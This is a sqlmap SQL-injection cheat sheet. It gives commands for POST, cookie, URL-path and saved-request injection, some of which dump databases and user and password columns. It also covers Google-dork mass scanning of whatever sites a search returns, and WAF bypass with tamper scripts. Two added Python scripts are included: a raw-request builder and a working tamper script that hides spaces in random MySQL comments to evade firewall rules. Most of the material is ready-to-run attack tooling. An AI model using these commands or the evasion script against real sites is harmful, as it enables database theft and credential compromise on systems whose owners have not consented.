Sqlmap
sqlmap POST injection
Automatic detection (GET parameter, thorough tests only after a positive heuristic check):
sqlmap -u "http://www.xxx.com/news?id=1" --smart --level 3 --users
Single POST parameter injection:
sqlmap -u "http://www.xxx.com/1.php" --data="id=1"
Multiple POST values with a custom parameter delimiter (here ";" instead of the default "&"):
sqlmap -u "http://www.xxx.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users
Automatic form detection (sqlmap parses the forms on the page and tests their fields):
sqlmap -u "http://xxxx.xxxx.com/login.asp" --forms
Injection from a saved request file:
sqlmap -r key.txt -p "name,pass"  (key.txt is a raw HTTP request saved from a proxy such as Burp; -r takes its path, so the file can live anywhere; -p limits testing to the listed parameters)
Injection after login (send the session cookie together with the POST body):
sqlmap -u "http://www.xxx.com/vuln.php" --data="query=foobar;id=1" --param-del=";" --cookie="<cookie from a successful login>" -f --banner --dbs --users
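The -r option above wants a raw HTTP request on disk, which the cheat sheet does not show. The following script, an added example that is not from the original page or from sqlmap itself, writes such a file from the same URL, POST body and cookie used in the commands above (the host, body and cookie values are constructed placeholders). It produces the request line, Host/Cookie/Content-Type/Content-Length headers, a blank line and the body, which is exactly what sqlmap -r parses; a "*" left anywhere in the URL, body or a header value is kept verbatim because sqlmap treats it as a custom injection marker.

```python
#!/usr/bin/env python3
"""Build a raw HTTP request file for `sqlmap -r` (added example, not from
the original page or from sqlmap itself)."""
from urllib.parse import urlsplit

# Constructed sample values; host and cookie are placeholders, not real.
SAMPLE_URL = "http://www.xxx.com/vuln.php"
SAMPLE_DATA = "query=foobar;id=1"
SAMPLE_COOKIE = "PHPSESSID=0123456789abcdef; logged_in=1"


def build_request_file(url, data=None, cookie=None, extra_headers=None,
                       user_agent="Mozilla/5.0"):
    """Return the text of a raw HTTP/1.1 request as sqlmap -r expects it:
    request line, headers, blank line, body. A POST is emitted when data
    is given, otherwise a GET. Any '*' in the URL, body or a header value
    is passed through untouched (sqlmap's custom injection marker)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("url must be absolute, e.g. http://host/path")
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    method = "POST" if data is not None else "GET"
    headers = [("Host", parts.netloc), ("User-Agent", user_agent)]
    if cookie:
        headers.append(("Cookie", cookie))
    if data is not None:
        headers.append(("Content-Type", "application/x-www-form-urlencoded"))
        headers.append(("Content-Length", str(len(data.encode("utf-8")))))
    for name, value in (extra_headers or {}).items():
        headers.append((name, value))
    lines = ["%s %s HTTP/1.1" % (method, path)]
    lines += ["%s: %s" % (name, value) for name, value in headers]
    # sqlmap reads everything after the first empty line as the body.
    body = data if data is not None else ""
    return "\r\n".join(lines) + "\r\n\r\n" + body


def write_request_file(path, **kwargs):
    """Write the request to `path` (CRLF line endings, as a proxy would save it)."""
    text = build_request_file(**kwargs)
    with open(path, "w", newline="") as fh:
        fh.write(text)
    return text


if __name__ == "__main__":
    # File-based equivalent of the --data/--cookie invocation above, then:
    #   sqlmap -r key.txt --param-del=";" -p "id" --batch
    print(write_request_file("key.txt", url=SAMPLE_URL,
                             data=SAMPLE_DATA, cookie=SAMPLE_COOKIE))
```

Content-Length is computed from the encoded body, so the file stays valid if the body is edited to contain non-ASCII characters; when sqlmap is given a file whose Content-Length is wrong it still works, but a real proxy replay would not.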
sqlmap cookie injection
Single injection (cookie values are only tested at --level 2 or higher):
sqlmap -u "http://127.0.0.1/base.php" --cookie "id=1" --dbs --level 2
sqlmap -u "url" --cookie "id=1" --columns -T <table> --level 2
sqlmap -u "url" --cookie "id=1" --dump -T <table> -C "user,pass" --level 2
Pseudo-static injection (the "*" marks the injection point inside the URL path):
sqlmap -u "http://www.xxx.com/x*.html" --dbs
Request delay injection:
sqlmap --dbs -u "http://www.xxx.com/x*.html" --delay 1  (seconds between requests; optional)
sqlmap --dbs -u "http://www.xxx.com/x*.html" --safe-freq 1  (number of test requests between two visits to the safe URL; any value; only takes effect together with --safe-url)
————————————————————————–
Bypassing a WAF with tamper scripts:
sqlmap -u url -v 3 --dbs --batch --tamper "space2morehash.py"
Other bundled tamper scripts: space2hash.py, base64encode.py, charencode.py (the ".py" suffix is optional, several can be chained with commas, e.g. --tamper "space2hash,charencode"; space2hash and space2morehash only work against MySQL because they rely on "#" comments)
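To see what --tamper actually changes on the wire, here is a custom tamper script in the format sqlmap loads, written as an added example modelled on the bundled space2hash script (it is not sqlmap's own code and differs in its random alphabet and in leaving single-quoted literals alone). Each space outside a quoted string becomes a MySQL "#<random>\n" comment, URL-encoded as %23<random>%0A: MySQL parses the comment as whitespace, so the query still runs, while a WAF rule matching "UNION SELECT" or "AND 1=1" with literal spaces no longer fires. The payload in the __main__ block is constructed; the host in the usage line is a placeholder.

```python
#!/usr/bin/env python3
"""space2hash_demo.py - a custom sqlmap tamper script (added example,
modelled on sqlmap's bundled space2hash; not sqlmap's own code).

Usage (a path works from anywhere; copy into sqlmap/tamper/ to use the bare name):
    sqlmap -u "http://www.xxx.com/news?id=1" --tamper=/path/to/space2hash_demo.py --dbs

MySQL only: '#' does not start a comment on other back-ends.
"""
import random
import re
import string
from urllib.parse import unquote

try:
    # Present when sqlmap imports the script; absent when run stand-alone.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.LOW
except ImportError:
    __priority__ = -10  # the value sqlmap assigns to PRIORITY.LOW


def dependencies():
    # sqlmap calls this once at start-up; bundled scripts use it to warn
    # about the DBMS they target. Nothing further to check here.
    pass


def random_token(length=6, rng=random):
    """Random comment body; letters and digits only, so it never
    contains '%', a quote or a newline."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(rng.choice(alphabet) for _ in range(length))


# A space followed by an even number of single quotes up to the end of the
# payload, i.e. a space that is not inside a quoted literal.
_SPACE_OUTSIDE_QUOTES = re.compile(r" (?=(?:[^']*'[^']*')*[^']*$)")


def space_to_hash_comment(payload, rng=random):
    """Replace every unquoted space with '%23<token>%0A' (a '#...\\n' comment)."""
    if not payload:
        return payload
    return _SPACE_OUTSIDE_QUOTES.sub(
        lambda m: "%23" + random_token(rng=rng) + "%0A", payload)


def as_seen_by_mysql(tampered):
    """URL-decode the tampered payload to show the text MySQL will parse."""
    return unquote(tampered)


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload before sending it."""
    return space_to_hash_comment(payload)


if __name__ == "__main__":
    sample = "1 AND 'x y'='x y' UNION SELECT 1,2"   # constructed payload
    out = tamper(sample)
    print(out)
    print(repr(as_seen_by_mysql(out)))
```

The comment body is randomised on every call so two requests never carry the same bytes, which is what defeats WAFs that cache or fingerprint a blocked payload; the trade-off is that the query becomes multi-line, so any WAF that normalises comments before matching will still see the original statement.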
————————————————————————–
Google dork batch detection:
sqlmap -g "keywords"  (-g takes a Google dork; every URL in the search results is tested)
Request options:
These options specify how sqlmap connects to the target URL.
--data=DATA            Data string to be sent through POST
--cookie=COOKIE        HTTP Cookie header value
--cookie-urlencode     URL-encode generated cookie injections (older sqlmap versions only)
--drop-set-cookie      Ignore Set-Cookie headers in responses
--user-agent=AGENT     HTTP User-Agent header value
--random-agent         Use a randomly selected HTTP User-Agent header
--referer=REFERER      HTTP Referer header value
--headers=HEADERS      Extra headers, separated by newlines (e.g. "Accept-Language: fr\nETag: 123")
--auth-type=ATYPE      HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED      HTTP authentication credentials (name:password)
--auth-cert=ACERT      HTTP authentication certificate (key_file,cert_file); newer sqlmap versions use --auth-file instead
--proxy=PROXY          Use an HTTP proxy to connect to the target URL
--proxy-cred=PCRED     HTTP proxy authentication credentials (name:password)
--ignore-proxy         Ignore the system default HTTP proxy
--delay=DELAY          Delay in seconds between each HTTP request
--timeout=TIMEOUT      Seconds to wait before a connection is considered timed out (default 30)
--retries=RETRIES      Retries when the connection times out (default 3)
--scope=SCOPE          Regexp to filter targets from the provided proxy log (used with -l)
--safe-url=SAFURL      URL to visit frequently during testing (keeps the session alive; see --safe-freq)
sqlmap POST and cookie injection summary